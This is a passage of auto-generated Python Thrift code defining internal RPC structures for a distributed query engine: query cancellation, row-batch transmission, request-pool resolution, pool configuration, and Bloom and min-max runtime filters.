return iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 1: if ftype == TType.I32: self.protocol_version = iprot.readI32(); else: iprot.skip(ftype) elif fid == 2: if ftype == TType.STRUCT: self.query_id = Types.ttypes.TUniqueId() self.query_id.read(iprot) else: iprot.skip(ftype) else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() def write(self, oprot): if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None: oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec))) return oprot.writeStructBegin('TCancelQueryFInstancesParams') if self.protocol_version is not None: oprot.writeFieldBegin('protocol_version', TType.I32, 1) oprot.writeI32(self.protocol_version) oprot.writeFieldEnd() if self.query_id is not None: oprot.writeFieldBegin('query_id', TType.STRUCT, 2) self.query_id.write(oprot) oprot.writeFieldEnd() oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): if self.protocol_version is None: raise TProtocol.TProtocolException(message='Required field protocol_version is unset!') return def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class TCancelQueryFInstancesResult: """ Attributes: - status """ thrift_spec = ( None, # 0 (1, TType.STRUCT, 'status', (Status.ttypes.TStatus, Status.ttypes.TStatus.thrift_spec), None, ), # 1 ) def __init__(self, status=None,): self.status = status def read(self, iprot): if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None: fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec)) return iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 1: if ftype == TType.STRUCT: self.status = Status.ttypes.TStatus() self.status.read(iprot) else: iprot.skip(ftype) else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() def write(self, oprot): if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None: oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec))) return oprot.writeStructBegin('TCancelQueryFInstancesResult') if self.status is not None: oprot.writeFieldBegin('status', TType.STRUCT, 1) self.status.write(oprot) oprot.writeFieldEnd() oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): return def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class TTransmitDataParams: """ Attributes: - protocol_version - dest_fragment_instance_id - sender_id - dest_node_id - row_batch - eos """ thrift_spec = ( None, # 0 (1, TType.I32, 'protocol_version', None, None, ), # 1 (2, TType.STRUCT, 'dest_fragment_instance_id', (Types.ttypes.TUniqueId, Types.ttypes.TUniqueId.thrift_spec), None, ), # 2 (3, TType.I32, 'sender_id', None, None, ), # 3 (4, TType.I32, 'dest_node_id', None, None, ), # 4 (5, TType.STRUCT, 'row_batch', (Results.ttypes.TRowBatch, Results.ttypes.TRowBatch.thrift_spec), None, ), # 5 (6, TType.BOOL, 'eos', None, None, ), # 6 ) def __init__(self, protocol_version=None, dest_fragment_instance_id=None, sender_id=None, dest_node_id=None, row_batch=None, eos=None,): self.protocol_version = protocol_version self.dest_fragment_instance_id = dest_fragment_instance_id self.sender_id = sender_id self.dest_node_id = dest_node_id self.row_batch = row_batch self.eos = eos def read(self, iprot): if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None: fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec)) return iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 1: if ftype == TType.I32: self.protocol_version = iprot.readI32(); else: iprot.skip(ftype) elif fid == 2: if ftype == TType.STRUCT: self.dest_fragment_instance_id = Types.ttypes.TUniqueId() self.dest_fragment_instance_id.read(iprot) else: iprot.skip(ftype) elif fid == 3: if ftype == TType.I32: self.sender_id = iprot.readI32(); else: iprot.skip(ftype) elif fid == 4: if ftype == TType.I32: self.dest_node_id = iprot.readI32(); else: iprot.skip(ftype) elif fid == 5: if ftype == TType.STRUCT: self.row_batch = Results.ttypes.TRowBatch() self.row_batch.read(iprot) else: iprot.skip(ftype) elif fid == 6: if ftype == TType.BOOL: self.eos = iprot.readBool(); else: iprot.skip(ftype) else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() def write(self, oprot): if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None: oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec))) return oprot.writeStructBegin('TTransmitDataParams') if self.protocol_version is not None: oprot.writeFieldBegin('protocol_version', TType.I32, 1) oprot.writeI32(self.protocol_version) oprot.writeFieldEnd() if self.dest_fragment_instance_id is not None: oprot.writeFieldBegin('dest_fragment_instance_id', TType.STRUCT, 2) self.dest_fragment_instance_id.write(oprot) oprot.writeFieldEnd() if self.sender_id is not None: oprot.writeFieldBegin('sender_id', TType.I32, 3) oprot.writeI32(self.sender_id) oprot.writeFieldEnd() if self.dest_node_id is not None: oprot.writeFieldBegin('dest_node_id', TType.I32, 4) oprot.writeI32(self.dest_node_id) oprot.writeFieldEnd() if self.row_batch is not None: oprot.writeFieldBegin('row_batch', TType.STRUCT, 5) self.row_batch.write(oprot) oprot.writeFieldEnd() if self.eos is not None: oprot.writeFieldBegin('eos', TType.BOOL, 6) oprot.writeBool(self.eos) oprot.writeFieldEnd() oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): if self.protocol_version is None: raise TProtocol.TProtocolException(message='Required field protocol_version is unset!') return def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class TTransmitDataResult: """ Attributes: - status """ thrift_spec = ( None, # 0 (1, TType.STRUCT, 'status', (Status.ttypes.TStatus, Status.ttypes.TStatus.thrift_spec), None, ), # 1 ) def __init__(self, status=None,): self.status = status def read(self, iprot): if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None: fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec)) return iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 1: if ftype == TType.STRUCT: self.status = Status.ttypes.TStatus() self.status.read(iprot) else: iprot.skip(ftype) else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() def write(self, oprot): if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None: oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec))) return oprot.writeStructBegin('TTransmitDataResult') if self.status is not None: oprot.writeFieldBegin('status', TType.STRUCT, 1) self.status.write(oprot) oprot.writeFieldEnd() oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): return def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class TResolveRequestPoolParams: """ Attributes: - user - requested_pool """ thrift_spec = ( None, # 0 (1, TType.STRING, 'user', None, None, ), # 1 (2, TType.STRING, 'requested_pool', None, None, ), # 2 ) def __init__(self, user=None, requested_pool=None,): self.user = user self.requested_pool = requested_pool def read(self, iprot): if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None: fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec)) return iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 1: if ftype == TType.STRING: self.user = iprot.readString(); else: iprot.skip(ftype) elif fid == 2: if ftype == TType.STRING: self.requested_pool = iprot.readString(); else: iprot.skip(ftype) else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() def write(self, oprot): if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None: oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec))) return oprot.writeStructBegin('TResolveRequestPoolParams') if self.user is not None: oprot.writeFieldBegin('user', TType.STRING, 1) oprot.writeString(self.user) oprot.writeFieldEnd() if self.requested_pool is not None: oprot.writeFieldBegin('requested_pool', TType.STRING, 2) oprot.writeString(self.requested_pool) oprot.writeFieldEnd() oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): if self.user is None: raise TProtocol.TProtocolException(message='Required field user is unset!') if self.requested_pool is None: raise TProtocol.TProtocolException(message='Required field requested_pool is unset!') return def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class TResolveRequestPoolResult: """ Attributes: - resolved_pool - has_access - status """ thrift_spec = ( None, # 0 (1, TType.STRING, 'resolved_pool', None, None, ), # 1 (2, TType.BOOL, 'has_access', None, None, ), # 2 (3, TType.STRUCT, 'status', (Status.ttypes.TStatus, Status.ttypes.TStatus.thrift_spec), None, ), # 3 ) def __init__(self, resolved_pool=None, has_access=None, status=None,): self.resolved_pool = resolved_pool self.has_access = has_access self.status = status def read(self, iprot): if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None: fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec)) return iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 1: if ftype == TType.STRING: self.resolved_pool = iprot.readString(); else: iprot.skip(ftype) elif fid == 2: if ftype == TType.BOOL: self.has_access = iprot.readBool(); else: iprot.skip(ftype) elif fid == 3: if ftype == TType.STRUCT: self.status = Status.ttypes.TStatus() self.status.read(iprot) else: iprot.skip(ftype) else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() def write(self, oprot): if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None: oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec))) return oprot.writeStructBegin('TResolveRequestPoolResult') if self.resolved_pool is not None: oprot.writeFieldBegin('resolved_pool', TType.STRING, 1) oprot.writeString(self.resolved_pool) oprot.writeFieldEnd() if self.has_access is not None: oprot.writeFieldBegin('has_access', TType.BOOL, 2) oprot.writeBool(self.has_access) oprot.writeFieldEnd() if self.status is not None: oprot.writeFieldBegin('status', TType.STRUCT, 3) self.status.write(oprot) oprot.writeFieldEnd() oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): return def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class TPoolConfigParams: """ Attributes: - pool """ thrift_spec = ( None, # 0 (1, TType.STRING, 'pool', None, None, ), # 1 ) def __init__(self, pool=None,): self.pool = pool def read(self, iprot): if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None: fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec)) return iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 1: if ftype == TType.STRING: self.pool = iprot.readString(); else: iprot.skip(ftype) else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() def write(self, oprot): if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None: oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec))) return oprot.writeStructBegin('TPoolConfigParams') if self.pool is not None: oprot.writeFieldBegin('pool', TType.STRING, 1) oprot.writeString(self.pool) oprot.writeFieldEnd() oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): if self.pool is None: raise TProtocol.TProtocolException(message='Required field pool is unset!') return def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class TPoolConfig: """ Attributes: - max_requests - max_queued - max_mem_resources - queue_timeout_ms - default_query_options """ thrift_spec = ( None, # 0 (1, TType.I64, 'max_requests', None, None, ), # 1 (2, TType.I64, 'max_queued', None, None, ), # 2 (3, TType.I64, 'max_mem_resources', None, None, ), # 3 (4, TType.I64, 'queue_timeout_ms', None, None, ), # 4 (5, TType.STRING, 'default_query_options', None, None, ), # 5 ) def __init__(self, max_requests=None, max_queued=None, max_mem_resources=None, queue_timeout_ms=None, default_query_options=None,): self.max_requests = max_requests self.max_queued = max_queued self.max_mem_resources = max_mem_resources self.queue_timeout_ms = queue_timeout_ms self.default_query_options = default_query_options def read(self, iprot): if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None: fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec)) return iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 1: if ftype == TType.I64: self.max_requests = iprot.readI64(); else: iprot.skip(ftype) elif fid == 2: if ftype == TType.I64: self.max_queued = iprot.readI64(); else: iprot.skip(ftype) elif fid == 3: if ftype == TType.I64: self.max_mem_resources = iprot.readI64(); else: iprot.skip(ftype) elif fid == 4: if ftype == TType.I64: self.queue_timeout_ms = iprot.readI64(); else: iprot.skip(ftype) elif fid == 5: if ftype == TType.STRING: self.default_query_options = iprot.readString(); else: iprot.skip(ftype) else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() def write(self, oprot): if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None: oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec))) return oprot.writeStructBegin('TPoolConfig') if self.max_requests is not None: oprot.writeFieldBegin('max_requests', TType.I64, 1) oprot.writeI64(self.max_requests) oprot.writeFieldEnd() if self.max_queued is not None: oprot.writeFieldBegin('max_queued', TType.I64, 2) oprot.writeI64(self.max_queued) oprot.writeFieldEnd() if self.max_mem_resources is not None: oprot.writeFieldBegin('max_mem_resources', TType.I64, 3) oprot.writeI64(self.max_mem_resources) oprot.writeFieldEnd() if self.queue_timeout_ms is not None: oprot.writeFieldBegin('queue_timeout_ms', TType.I64, 4) oprot.writeI64(self.queue_timeout_ms) oprot.writeFieldEnd() if self.default_query_options is not None: oprot.writeFieldBegin('default_query_options', TType.STRING, 5) oprot.writeString(self.default_query_options) oprot.writeFieldEnd() oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): if self.max_requests is None: raise TProtocol.TProtocolException(message='Required field max_requests is unset!') if self.max_queued is None: raise TProtocol.TProtocolException(message='Required field max_queued is unset!') if self.max_mem_resources is None: raise TProtocol.TProtocolException(message='Required field max_mem_resources is unset!') if self.default_query_options is None: raise TProtocol.TProtocolException(message='Required field default_query_options is unset!') return def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class TBloomFilter: """ Attributes: - log_heap_space - directory - always_true - always_false """ thrift_spec = ( None, # 0 (1, TType.I32, 'log_heap_space', None, None, ), # 1 (2, TType.STRING, 'directory', None, None, ), # 2 (3, TType.BOOL, 'always_true', None, None, ), # 3 (4, TType.BOOL, 'always_false', None, None, ), # 4 ) def __init__(self, log_heap_space=None, directory=None, always_true=None, always_false=None,): self.log_heap_space = log_heap_space self.directory = directory self.always_true = always_true self.always_false = always_false def read(self, iprot): if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None: fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec)) return iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 1: if ftype == TType.I32: self.log_heap_space = iprot.readI32(); else: iprot.skip(ftype) elif fid == 2: if ftype == TType.STRING: self.directory = iprot.readString(); else: iprot.skip(ftype) elif fid == 3: if ftype == TType.BOOL: self.always_true = iprot.readBool(); else: iprot.skip(ftype) elif fid == 4: if ftype == TType.BOOL: self.always_false = iprot.readBool(); else: iprot.skip(ftype) else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() def write(self, oprot): if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None: oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec))) return oprot.writeStructBegin('TBloomFilter') if self.log_heap_space is not None: oprot.writeFieldBegin('log_heap_space', TType.I32, 1) oprot.writeI32(self.log_heap_space) oprot.writeFieldEnd() if self.directory is not None: oprot.writeFieldBegin('directory', TType.STRING, 2) oprot.writeString(self.directory) oprot.writeFieldEnd() if self.always_true is not None: oprot.writeFieldBegin('always_true', TType.BOOL, 3) oprot.writeBool(self.always_true) oprot.writeFieldEnd() if self.always_false is not None: oprot.writeFieldBegin('always_false', TType.BOOL, 4) oprot.writeBool(self.always_false) oprot.writeFieldEnd() oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): if self.log_heap_space is None: raise TProtocol.TProtocolException(message='Required field log_heap_space is unset!') if self.always_true is None: raise TProtocol.TProtocolException(message='Required field always_true is unset!') if self.always_false is None: raise TProtocol.TProtocolException(message='Required field always_false is unset!') return def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class TMinMaxFilter: """ Attributes: - always_true - always_false - min - max """ thrift_spec = ( None, # 0 (1, TType.BOOL, 'always_true', None, None, ), # 1 (2, TType.BOOL, 'always_false', None, None, ), # 2 (3, TType.STRUCT, 'min', (Data.ttypes.TColumnValue, Data.ttypes.TColumnValue.thrift_spec), None, ), # 3 (4, TType.STRUCT, 'max', (Data.ttypes.TColumnValue, Data.ttypes.TColumnValue.thrift_spec), None, ), # 4 ) def __init__(self, always_true=None, always_false=None, min=None, max=None,): self.always_true = always_true self.always_false = always_false self.min = min self.max = max def read(self, iprot): if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None: fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec)) return iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 1: if ftype == TType.BOOL: self.always_true = iprot.readBool(); else: iprot.skip(ftype) elif fid == 2: if ftype == TType.BOOL: self.always_false = iprot.readBool(); else: iprot.skip(ftype) elif fid == 3: if ftype == TType.STRUCT: self.min = Data.ttypes.TColumnValue() self.min.read(iprot) else: iprot.skip(ftype) elif fid == 4: if ftype == TType.STRUCT: self.max = Data.ttypes.TColumnValue() self.max.read(iprot) else: iprot.skip(ftype) else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() def write(self, oprot): if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None: oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec))) return oprot.writeStructBegin('TMinMaxFilter') if self.always_true is not None: oprot.writeFieldBegin('always_true', TType.BOOL, 1) oprot.writeBool(self.always_true) oprot.writeFieldEnd() if self.always_false is not None: oprot.writeFieldBegin('always_false', TType.BOOL, 2) oprot.writeBool(self.always_false) oprot.writeFieldEnd() if self.min is not None: oprot.writeFieldBegin('min', TType.STRUCT, 3) self.min.write(oprot) oprot.writeFieldEnd() if self.max is not None: oprot.writeFieldBegin('max', TType.STRUCT, 4) self.max.write(oprot) oprot.writeFieldEnd() oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): if self.always_true is None: raise TProtocol.TProtocolException(message='Required field always_true is unset!') if self.always_false is None: raise TProtocol.TProtocolException(message='Required field always_false is unset!') return def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class TUpdateFilterParams: """ Attributes: - protocol_version - filter_id - query_id - bloom_filter - min_max_filter """ thrift_spec = ( None, # 0 (1, TType.I32, 'protocol_version', None, None, ), # 1 (2, TType.I32, 'filter_id', None, None, ), # 2 (3, TType.STRUCT, 'query_id', (Types.ttypes.TUniqueId, Types.ttypes.TUniqueId.thrift_spec), None, ), # 3 (4, TType.STRUCT, 'bloom_filter', (TBloomFilter, TBloomFilter.thrift_spec), None, ), # 4 (5, TType.STRUCT, 'min_max_filter', (TMinMaxFilter, TMinMaxFilter.thrift_spec), None, ), # 5 ) def __init__(self, protocol_version=None, filter_id=None, query_id=None, bloom_filter=None, min_max_filter=None,): self.protocol_version = protocol_version self.filter_id = filter_id self.query_id = query_id self.bloom_filter = bloom_filter self.min_max_filter = min_max_filter def read(self, iprot): if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None: fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec)) return iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 1: if ftype == TType.I32: self.protocol_version = iprot.readI32(); else: iprot.skip(ftype) elif fid == 2: if ftype == TType.I32: self.filter_id = iprot.readI32(); else: iprot.skip(ftype) elif fid == 3: if ftype == TType.STRUCT: self.query_id = Types.ttypes.TUniqueId() self.query_id.read(iprot) else: iprot.skip(ftype) elif fid == 4: if ftype == TType.STRUCT: self.bloom_filter = TBloomFilter() self.bloom_filter.read(iprot) else: iprot.skip(ftype) elif fid == 5: if ftype == TType.STRUCT: self.min_max_filter = TMinMaxFilter() self.min_max_filter.read(iprot) else: iprot.skip(ftype) else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() def write(self, oprot): if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None: oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec))) return oprot.writeStructBegin('TUpdateFilterParams') if self.protocol_version is not None: oprot.writeFieldBegin('protocol_version', TType.I32, 1) oprot.writeI32(self.protocol_version) oprot.writeFieldEnd() if self.filter_id is not None: oprot.writeFieldBegin('filter_id', TType.I32, 2) oprot.writeI32(self.filter_id) oprot.writeFieldEnd() if self.query_id is not None: oprot.writeFieldBegin('query_id', TType.STRUCT, 3) self.query_id.write(oprot) oprot.writeFieldEnd() if self.bloom_filter is not None: oprot.writeFieldBegin('bloom_filter', TType.STRUCT, 4) self.bloom_filter.write(oprot) oprot.writeFieldEnd() if self.min_max_filter is not None: oprot.writeFieldBegin('min_max_filter', TType.STRUCT, 5) self.min_max_filter.write(oprot) oprot.writeFieldEnd() oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): if self.protocol_version is None: raise TProtocol.TProtocolException(message='Required field protocol_version is unset!') return def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class TUpdateFilterResult: thrift_spec = ( ) def read(self, iprot): if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None: fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec)) return iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() def write(self, oprot): if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None: oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec))) return oprot.writeStructBegin('TUpdateFilterResult') oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): return def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class TPublishFilterParams: """ Attributes: - protocol_version - filter_id - dst_query_id - dst_fragment_idx - bloom_filter - min_max_filter """ thrift_spec = ( None, # 0 (1, TType.I32, 'protocol_version', None, None, ), # 1 (2, TType.I32, 'filter_id', None, None, ), # 2 (3, TType.STRUCT, 'dst_query_id', (Types.ttypes.TUniqueId, Types.ttypes.TUniqueId.thrift_spec), None, ), # 3 (4, TType.I32, 'dst_fragment_idx', None, None, ), # 4 (5, TType.STRUCT, 'bloom_filter', (TBloomFilter, TBloomFilter.thrift_spec), None, ), # 5 (6, TType.STRUCT, 'min_max_filter', (TMinMaxFilter, TMinMaxFilter.thrift_spec), None, ), # 6 ) def __init__(self, protocol_version=None, filter_id=None, dst_query_id=None, dst_fragment_idx=None, bloom_filter=None, min_max_filter=None,): self.protocol_version = protocol_version self.filter_id = filter_id self.dst_query_id = dst_query_id self.dst_fragment_idx = dst_fragment_idx self.bloom_filter = bloom_filter self.min_max_filter = min_max_filter def read(self, iprot): if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None: fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec)) return iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 1: if ftype == TType.I32: self.protocol_version = iprot.readI32(); else: iprot.skip(ftype) elif fid == 2: if ftype == TType.I32: self.filter_id = iprot.readI32(); else: iprot.skip(ftype) elif fid == 3: if ftype == TType.STRUCT: self.dst_query_id = Types.ttypes.TUniqueId() self.dst_query_id.read(iprot) else: iprot.skip(ftype) elif fid == 4: if ftype == TType.I32: self.dst_fragment_idx = iprot.readI32(); else: iprot.skip(ftype) elif fid == 5: if ftype == TType.STRUCT: self.bloom_filter = TBloomFilter() self.bloom_filter.read(iprot) else: iprot.skip(ftype) elif fid == 6: if ftype == TType.STRUCT: self.min_max_filter = TMinMaxFilter() self.min_max_filter.read(iprot) else: iprot.skip(ftype) else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() def write(self, oprot): if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None: oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec))) return oprot.writeStructBegin('TPublishFilterParams') if self.protocol_version is not None: oprot.writeFieldBegin('protocol_version', TType.I32, 1) oprot.writeI32(self.protocol_version) oprot.writeFieldEnd() if self.filter_id is not None: oprot.writeFieldBegin('filter_id', TType.I32, 2) oprot.writeI32(self.filter_id) oprot.writeFieldEnd() if self.dst_query_id is not None: oprot.writeFieldBegin('dst_query_id', TType.STRUCT, 3) self.dst_query_id.write(oprot) oprot.writeFieldEnd() if self.dst_fragment_idx is not None: oprot.writeFieldBegin('dst_fragment_idx', TType.I32, 4) oprot.writeI32(self.dst_fragment_idx) oprot.writeFieldEnd() if self.bloom_filter is not None: oprot.writeFieldBegin('bloom_filter', TType.STRUCT, 5) self.bloom_filter.write(oprot) oprot.writeFieldEnd() if self.min_max_filter is not None: oprot.writeFieldBegin('min_max_filter', TType.STRUCT, 6) self.min_max_filter.write(oprot) oprot.writeFieldEnd() oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): if self.protocol_version is None: raise TProtocol.TProtocolException(message='Required field protocol_version is unset!') return def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class TPublishFilterResult: thrift_spec = ( ) def read(self, iprot): if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, 